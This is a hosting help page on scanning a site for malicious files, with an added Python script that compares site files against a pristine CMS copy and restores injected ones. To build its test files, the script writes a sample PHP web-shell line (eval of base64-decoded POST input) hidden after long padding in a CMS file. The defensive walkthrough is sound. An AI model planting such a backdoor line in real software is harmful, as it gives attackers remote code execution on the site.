Working with the scanner (searching for malicious files)
The scanner searches for malicious code and files (web shells, spam mailers, and so on) using a database of known code signatures. It does not guarantee that every malicious file is found, and a flagged file is not necessarily malicious. Every result must be analyzed and verified by hand.
You can scan a single path or the entire hosting account. To scan the whole account, specify its root as the path: /home/LOGIN, where LOGIN is your hosting login.
Next, enter the URL of the signature database. We recommend a regularly updated database; to fill in its address, click the "Updated URL" button.
Below that is the list of file extensions to exclude: files with these extensions are not scanned. If you host a torrent site, add the torrent extension to this list as well.
If you check "Save scan results", the results are written to a file created in the root directory of your hosting account. This is useful when the account holds a large number of files (more than 100,000).
Scan result
After scanning the account you may see an unpleasant result like the one in the screenshot.
Important
The scanner's primary categories are Critical Files and Large Encrypted Files. All other categories list files that merely contain features commonly used by malicious code, so they need closer review before you act on them.
The shaded field in the example shows the path to the file in which code matching a signature from the database was detected.
The example shows several files, but in fact only two signatures were matched:
1 - PCT4BA6ODSE
2 - wUu2jGoB;0i_SN\tn%Vg)ZI^sTRyvL
Let's look at the first one.
Open WebFTP in a new window and, in the path field, enter the path to one of the flagged files: /home/LOGIN/folders/xd_receiver_ssl.php
Click the file; it opens in text mode. At first glance nothing looks suspicious.
But scroll sideways a little and the malicious code appears at once: it sits far to the right on a very long line, outside the visible area at the normal window width.
Remove the malicious code and save the file.
In this example, malicious code was injected into a legitimate CMS file. Remove only the injected code and keep the file itself, or simply replace the whole file with the original from the CMS distribution.
Check every scan result carefully and compare the flagged files with the originals from the developer.
Now the second one:
Open the file /home/LOGIN/folders/diff.php via WebFTP:
Here the whole file is obfuscated (encoded) code, with no CMS code at all. Such a file is almost certainly malicious and must be deleted entirely. It may well be the file through which the others were infected.
Check each file reported by the scanner in the same way.
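The verification steps above (compare flagged files with the developer's originals, strip or restore an injected CMS file, delete a file the CMS never shipped) can be done systematically once you have a pristine copy of the same CMS release unpacked next to the site. The script below is an added example, not the hosting panel's or any CMS project's code: it hashes both trees, classifies site files as modified, unknown or missing, lists the lines that exist only in the site's copy of a modified file (an injection that is hidden off-screen shows up as one very long line), and restores modified files from the original. The sample trees, the line-length threshold and the file names are constructed for the example.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path

MAX_NORMAL_LINE = 200  # constructed threshold; longer lines deserve a look


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def file_map(root: Path) -> dict:
    """Relative POSIX path -> absolute path for every regular file under root."""
    return {p.relative_to(root).as_posix(): p for p in root.rglob("*") if p.is_file()}


def compare_trees(site: Path, original: Path) -> dict:
    """Classify site files against the pristine CMS copy by SHA-256.

    modified: shipped by the CMS but changed on the site (case 1 above)
    unknown:  not part of the CMS release at all (uploads, configs, or files like diff.php)
    missing:  shipped by the CMS but absent from the site
    """
    site_files, orig_files = file_map(site), file_map(original)
    modified = [r for r in site_files if r in orig_files
                and sha256_of(site_files[r]) != sha256_of(orig_files[r])]
    unknown = [r for r in site_files if r not in orig_files]
    missing = [r for r in orig_files if r not in site_files]
    return {"modified": sorted(modified), "unknown": sorted(unknown), "missing": sorted(missing)}


def injected_segments(site_file: Path, original_file: Path) -> list:
    """Lines present in the site's copy but absent from the original, with their length."""
    original_lines = set(original_file.read_text(errors="replace").splitlines())
    found = []
    for number, line in enumerate(site_file.read_text(errors="replace").splitlines(), 1):
        if line not in original_lines:
            found.append({"line": number, "length": len(line),
                          "long": len(line) > MAX_NORMAL_LINE,
                          "preview": " ".join(line.split())[:60]})
    return found


def restore_from_original(site: Path, original: Path, rel: str) -> bool:
    """Replace a modified file with the pristine one (the page's 'replace with the original')."""
    src = original / rel
    if not src.is_file():
        return False
    shutil.copyfile(src, site / rel)
    return True


def build_samples(site: Path, original: Path) -> None:
    """Constructed trees mirroring the two files discussed on the page."""
    clean = "<?php\n// ordinary CMS file\nfunction hello() { return 'hi'; }\n"
    for root in (site, original):
        (root / "folders").mkdir(parents=True)
        (root / "index.php").write_text(clean)
    (original / "folders" / "xd_receiver_ssl.php").write_text(clean)
    (original / "readme.txt").write_text("CMS readme\n")
    # Case 1: the CMS file with a payload appended on one long, space-padded line.
    payload = "<?php " + " " * 300 + "eval(base64_decode($_POST['c'])); ?>"
    (site / "folders" / "xd_receiver_ssl.php").write_text(clean + payload + "\n")
    # Case 2: a file the CMS never shipped. Site-specific config is "unknown" too,
    # which is why unknown files need a manual look rather than blind deletion.
    (site / "folders" / "diff.php").write_text("<?php eval(base64_decode('aGVsbG8='));")
    (site / "config.php").write_text("<?php $db_host = 'localhost';\n")


def demo() -> dict:
    """Build both trees in a temp directory, compare, locate injections, restore."""
    base = Path(tempfile.mkdtemp())
    site, original = base / "site", base / "original"
    build_samples(site, original)
    report = compare_trees(site, original)
    segments = {rel: injected_segments(site / rel, original / rel) for rel in report["modified"]}
    restored = [rel for rel in report["modified"] if restore_from_original(site, original, rel)]
    return {"report": report, "segments": segments, "restored": restored,
            "after": compare_trees(site, original)}


if __name__ == "__main__":
    result = demo()
    print("modified:", result["report"]["modified"])
    print("unknown (review by hand):", result["report"]["unknown"])
    for rel, segs in result["segments"].items():
        for seg in segs:
            print(f"  {rel}:{seg['line']} len={seg['length']} long={seg['long']} {seg['preview']}")
    print("restored:", result["restored"], "-> still modified:", result["after"]["modified"])
```

The modified file is restored automatically because the pristine copy tells you exactly what it should contain; the unknown files are only listed, since a site-specific config.php and a planted diff.php look the same to a hash comparison and only a human reading them can tell which is which.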
Where do malicious files come from?
Website owners typically give little thought to their site's security and are often unaware that their sites can be used to distribute malware, attack other sites, or serve other malicious purposes. In most cases, websites are compromised through vulnerabilities in their scripts.
How to protect yourself from website hacks?
If the site's engine (CMS, scripts) was written in-house, you need to look for vulnerabilities in it and fix them yourself. For ready-made CMS products (WordPress, Joomla, DLE, Drupal, etc.), use only the latest original, official release of the CMS from its developers.
Attention!
Do not use nulled (cracked, with license checks removed) versions of a CMS. Do not install add-ons, plugins, modules, hacks, themes or other extensions from dubious, unofficial sources: an unscrupulous add-on author may plant code in the package that gives them access to all of the site's files, which can cause you serious problems.
Important
Regularly update the CMS and all installed add-ons, plugins and extensions to their latest versions, since it is in new releases that developers close the vulnerabilities found in their product.
Note that if you delete these files, or the malicious code inside them, without investigating the cause of the infection, they will reappear after a while. Be sure to check your CMS and plugins for updates, or find and fix the vulnerability in your own scripts.